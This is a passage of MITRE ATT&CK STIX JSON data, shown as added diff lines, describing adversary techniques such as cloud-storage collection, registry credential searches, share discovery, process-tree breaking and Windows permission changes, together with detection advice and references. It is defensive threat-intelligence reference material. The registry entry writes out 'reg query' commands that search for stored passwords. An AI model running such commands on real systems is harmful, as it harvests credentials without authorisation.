"x_mitre_defense_bypassed": [ + "Windows User Account Control" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082", + "created": "2020-02-05T16:27:37.784Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1553/002", + "external_id": "T1553.002" + }, + { + "source_name": "EclecticLightChecksonEXECodeSigning", + "description": "Howard Oakley. (2020, November 16). Checks on executable code in Catalina and Big Sur: a first draft. Retrieved September 21, 2022.", + "url": "https://eclecticlight.co/2020/11/16/checks-on-executable-code-in-catalina-and-big-sur-a-first-draft/" + }, + { + "source_name": "Securelist Digital Certificates", + "description": "Ladikov, A. (2015, January 29). Why You Shouldn’t Completely Trust Files Signed with Digital Certificates. Retrieved March 31, 2016.", + "url": "https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/" + }, + { + "source_name": "Symantec Digital Certificates", + "description": "Shinotsuka, H. (2013, February 22). How Attackers Steal Private Keys from Digital Certificates. Retrieved March 31, 2016.", + "url": "http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates" + }, + { + "source_name": "Wikipedia Code Signing", + "description": "Wikipedia. (2015, November 10). Code Signing. Retrieved March 31, 2016.", + "url": "https://en.wikipedia.org/wiki/Code_signing" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-09-29T16:11:43.530Z", + "name": "Data from Cloud Storage", + "description": "Adversaries may access data from cloud storage.\n\nMany IaaS providers offer solutions for online data object storage such as Amazon S3, Azure Storage, and Google Cloud Storage. Similarly, SaaS enterprise platforms such as Office 365 and Google Workspace provide cloud-based document storage to users through services such as OneDrive and Google Drive, while SaaS application providers such as Slack, Confluence, Salesforce, and Dropbox may provide cloud storage solutions as a peripheral or primary use case of their platform. \n\nIn some cases, as with IaaS-based cloud storage, there exists no overarching application (such as SQL or Elasticsearch) with which to interact with the stored objects: instead, data from these solutions is retrieved directly though the [Cloud API](https://attack.mitre.org/techniques/T1059/009). In SaaS applications, adversaries may be able to collect this data directly from APIs or backend cloud storage objects, rather than through their front-end application or interface (i.e., [Data from Information Repositories](https://attack.mitre.org/techniques/T1213)). \n\nAdversaries may collect sensitive data from these cloud storage solutions. Providers typically offer security guides to help end users configure systems, though misconfigurations are a common problem.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019) There have been numerous incidents where cloud storage has been improperly secured, typically by unintentionally allowing public access to unauthenticated users, overly-broad access by all users, or even access for any anonymous person outside the control of the Identity Access Management system without even needing basic user permissions.\n\nThis open access may expose various types of sensitive data, such as credit cards, personally identifiable information, or medical records.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017)(Citation: Rclone-mega-extortion_05_2021)\n\nAdversaries may also obtain then abuse leaked credentials from source repositories, logs, or other means as a way to gain access to cloud storage objects.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Netskope", + "Praetorian", + "AppOmni" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for unusual queries to the cloud provider's storage service. Activity originating from unexpected sources may indicate improper permissions are set that is allowing access to data. Additionally, detecting failed attempts by a user for a certain object, followed by escalation of privileges by the same user, and access to the same object may be an indication of suspicious activity.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS", + "SaaS", + "Google Workspace", + "Office 365" + ], + "x_mitre_version": "2.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7", + "created": "2019-08-30T18:07:27.741Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1530", + "external_id": "T1530" + }, + { + "source_name": "Amazon S3 Security, 2019", + "description": "Amazon. (2019, May 17). How can I secure the files in my Amazon S3 bucket?. Retrieved October 4, 2019.", + "url": "https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/" + }, + { + "source_name": "Microsoft Azure Storage Security, 2019", + "description": "Amlekar, M., Brooks, C., Claman, L., et. al.. (2019, March 20). Azure Storage security guide. Retrieved October 4, 2019.", + "url": "https://docs.microsoft.com/en-us/azure/storage/common/storage-security-guide" + }, + { + "source_name": "Wired Magecart S3 Buckets, 2019", + "description": "Barrett, B.. (2019, July 11). Hack Brief: A Card-Skimming Hacker Group Hit 17K Domains—and Counting. Retrieved October 4, 2019.", + "url": "https://www.wired.com/story/magecart-amazon-cloud-hacks/" + }, + { + "source_name": "Google Cloud Storage Best Practices, 2019", + "description": "Google. (2019, September 16). Best practices for Cloud Storage. Retrieved October 4, 2019.", + "url": "https://cloud.google.com/storage/docs/best-practices" + }, + { + "source_name": "HIPAA Journal S3 Breach, 2017", + "description": "HIPAA Journal. (2017, October 11). 47GB of Medical Records and Test Results Found in Unsecured Amazon S3 Bucket. Retrieved October 4, 2019.", + "url": "https://www.hipaajournal.com/47gb-medical-records-unsecured-amazon-s3-bucket/" + }, + { + "source_name": "Rclone-mega-extortion_05_2021", + "description": "Justin Schoenfeld, Aaron Didier. (2021, May 4). Transferring leverage in a ransomware attack. Retrieved July 14, 2022.", + "url": "https://redcanary.com/blog/rclone-mega-extortion/" + }, + { + "source_name": "Trend Micro S3 Exposed PII, 2017", + "description": "Trend Micro. (2017, November 6). A Misconfigured Amazon S3 Exposed Almost 50 Thousand PII in Australia. Retrieved October 4, 2019.", + "url": "https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Runtime Data Manipulation", + "description": "Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nAdversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Inspect important application binary file hashes, locations, and modifications for suspicious/unexpected values.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_impact_type": [ + "Integrity" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator", + "root", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490", + "created": "2020-03-02T14:30:05.252Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1565/003", + "external_id": "T1565.003" + }, + { + "source_name": "FireEye APT38 Oct 2018", + "description": "FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.", + "url": "https://content.fireeye.com/apt/rpt-apt38" + }, + { + "source_name": "DOJ Lazarus Sony 2018", + "description": "Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.", + "url": "https://www.justice.gov/opa/press-release/file/1092091/download" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:03.187Z", + "name": "Data from Information Repositories", + "description": "Adversaries may target and collect data from information repositories. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes. Examples of information repositories include reference databases in the process environment, as well as databases in the corporate network that might contain information about the ICS.(Citation: Cybersecurity & Infrastructure Security Agency March 2018)\n\nInformation collected from these systems may provide the adversary with a better understanding of the operational environment, vendors used, processes, or procedures of the ICS.\n\nIn a campaign between 2011 and 2013 against ONG organizations, Chinese state-sponsored actors searched document repositories for specific information such as, system manuals, remote terminal unit (RTU) sites, personnel lists, documents that included the string SCAD*, user credentials, and remote dial-up access information. (Citation: CISA AA21-201A Pipeline Intrusion July 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Logon Session: Logon Session Creation", + "Network Share: Network Share Access", + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0811", + "external_id": "T0811" + }, + { + "source_name": "Cybersecurity & Infrastructure Security Agency March 2018", + "description": "Cybersecurity & Infrastructure Security Agency 2018, March 15 Alert (TA18-074A) Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors Retrieved. 2019/10/11 ", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-074A" + }, + { + "source_name": "CISA AA21-201A Pipeline Intrusion July 2021", + "description": "Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA) 2021, July 20 Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013 Retrieved. 2021/10/08 ", + "url": "https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-07-28T18:29:56.525Z", + "name": "Credentials in Registry", + "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.\n\nExample commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials)\n\n* Local Machine Hive: reg query HKLM /f password /t REG_SZ /s\n* Current User Hive: reg query HKCU /f password /t REG_SZ /s", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Sudhanshu Chauhan, @Sudhanshu_C" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_system_requirements": [ + "Ability to query some Registry locations depends on the adversary's level of access. User permissions are usually limited to access of user-related Registry keys." + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--341e222a-a6e3-4f6f-b69c-831d792b1580", + "created": "2020-02-04T12:58:40.678Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1552/002", + "external_id": "T1552.002" + }, + { + "source_name": "Pentestlab Stored Credentials", + "description": "netbiosX. (2017, April 19). Stored Credentials. Retrieved April 6, 2018.", + "url": "https://pentestlab.blog/2017/04/19/stored-credentials/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-09-29T19:44:43.870Z", + "name": "Network Share Discovery", + "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. \n\nFile sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the net view \\\\\\\\remotesystem command. It can also be used to query shared drives on the local system using net share. For macOS, the sharing -l command lists all shared points used for smb services.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Praetorian" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS", + "Windows", + "Linux" + ], + "x_mitre_version": "3.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1135", + "external_id": "T1135" + }, + { + "source_name": "TechNet Shared Folder", + "description": "Microsoft. (n.d.). Share a Folder or Drive. Retrieved June 30, 2017.", + "url": "https://technet.microsoft.com/library/cc770880.aspx" + }, + { + "source_name": "Wikipedia Shared Resource", + "description": "Wikipedia. (2017, April 15). Shared resource. Retrieved June 30, 2017.", + "url": "https://en.wikipedia.org/wiki/Shared_resource" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Peripheral Device Discovery", + "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.(Citation: Peripheral Discovery Linux)(Citation: Peripheral Discovery macOS) Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "created": "2017-05-31T21:31:28.471Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1120", + "external_id": "T1120" + }, + { + "source_name": "Peripheral Discovery Linux", + "description": "Shahriar Shovon. (2018, March). List USB Devices Linux. Retrieved March 11, 2022.", + "url": "https://linuxhint.com/list-usb-devices-linux/" + }, + { + "source_name": "Peripheral Discovery macOS", + "description": "SS64. (n.d.). system_profiler. Retrieved March 11, 2022.", + "url": "https://ss64.com/osx/system_profiler.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-03T04:06:42.256Z", + "name": "Break Process Trees", + "description": "An adversary may attempt to evade process tree-based analysis by modifying executed malware's parent process ID (PPID). If endpoint protection software leverages the “parent-child\" relationship for detection, breaking this relationship could result in the adversary’s behavior not being associated with previous process tree activity. On Unix-based systems breaking this process tree is common practice for administrators to execute software using scripts and programs.(Citation: 3OHA double-fork 2022) \n\nOn Linux systems, adversaries may execute a series of [Native API](https://attack.mitre.org/techniques/T1106) calls to alter malware's process tree. For example, adversaries can execute their payload without any arguments, call the `fork()` API call twice, then have the parent process exit. This creates a grandchild process with no parent process that is immediately adopted by the `init` system process (PID 1), which successfully disconnects the execution of the adversary's payload from its previous process tree.\n\nAnother example is using the “daemon” syscall to detach from the current parent process and run in the background.(Citation: Sandfly BPFDoor 2022)(Citation: Microsoft XorDdos Linux Stealth 2022) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Tim (Wadhwa-)Brown" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--34a80bc4-80f2-46e6-94ff-f3265a4b657c", + "created": "2023-09-27T19:49:40.815Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1036/009", + "external_id": "T1036.009" + }, + { + "source_name": "3OHA double-fork 2022", + "description": "Juan Tapiador. (2022, April 11). UNIX daemonization and the double fork. Retrieved September 29, 2023.", + "url": "https://0xjet.github.io/3OHA/2022/04/11/post.html" + }, + { + "source_name": "Microsoft XorDdos Linux Stealth 2022", + "description": "Microsoft Threat Intelligence. (2022, May 19). Rise in XorDdos: A deeper look at the stealthy DDoS malware targeting Linux devices. Retrieved September 27, 2023.", + "url": "https://www.microsoft.com/en-us/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/" + }, + { + "source_name": "Sandfly BPFDoor 2022", + "description": "The Sandfly Security Team. (2022, May 11). BPFDoor - An Evasive Linux Backdoor Technical Analysis. Retrieved September 29, 2023.", + "url": "https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Network Topology", + "description": "Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: DNS Dumpster) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--34ab90a3-05f6-4259-8f21-621081fdaba5", + "created": "2020-10-02T15:49:03.815Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1590/004", + "external_id": "T1590.004" + }, + { + "source_name": "DNS Dumpster", + "description": "Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.", + "url": "https://dnsdumpster.com/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Code Signing Certificates", + "description": "Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.\n\nPrior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may develop self-signed code signing certificates for use in operations.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Consider analyzing self-signed code signing certificates for features that may be associated with the adversary and/or their developers, such as the thumbprint, algorithm used, validity period, and common name. Malware repositories can also be used to identify additional samples associated with the adversary and identify patterns an adversary has used in crafting self-signed code signing certificates.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--34b3f738-bd64-40e5-a112-29b0542bc8bf", + "created": "2020-10-01T01:41:08.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1587/002", + "external_id": "T1587.002" + }, + { + "source_name": "Wikipedia Code Signing", + "description": "Wikipedia. (2015, November 10). Code Signing. Retrieved March 31, 2016.", + "url": "https://en.wikipedia.org/wiki/Code_signing" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Windows File and Directory Permissions Modification", + "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nWindows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018)\n\nAdversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor and investigate attempts to modify DACLs and file/directory ownership. Many of the commands used to modify DACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.\n\nConsider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--34e793de-0274-4982-9c1a-246ed1c19dee", + "created": "2020-02-04T19:17:41.767Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1222/001", + "external_id": "T1222.001" + }, + { + "source_name": "Hybrid Analysis Icacls1 June 2018", + "description": "Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe. Retrieved August 19, 2018.", + "url": "https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100" + }, + { + "source_name": "Hybrid Analysis Icacls2 May 2018", + "description": "Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018.", + "url": "https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110" + }, + { + "source_name": "Microsoft Access Control Lists May 2018", + "description": "M. Satran, M. Jacobs. (2018, May 30). Access Control Lists. Retrieved February 4, 2020.", + "url": "https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists" + }, + { + "source_name": "Microsoft DACL May 2018", + "description": "Microsoft. (2018, May 30). DACLs and ACEs. Retrieved August 19, 2018.", + "url": "https://docs.microsoft.com/windows/desktop/secauthz/dacls-and-aces" + }, + { + "source_name": "EventTracker File Permissions Feb 2014", + "description": "Netsurion. (2014, February 19). Monitoring File Permission Changes with the Windows Security Log. Retrieved August 19, 2018.", + "url": "https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + 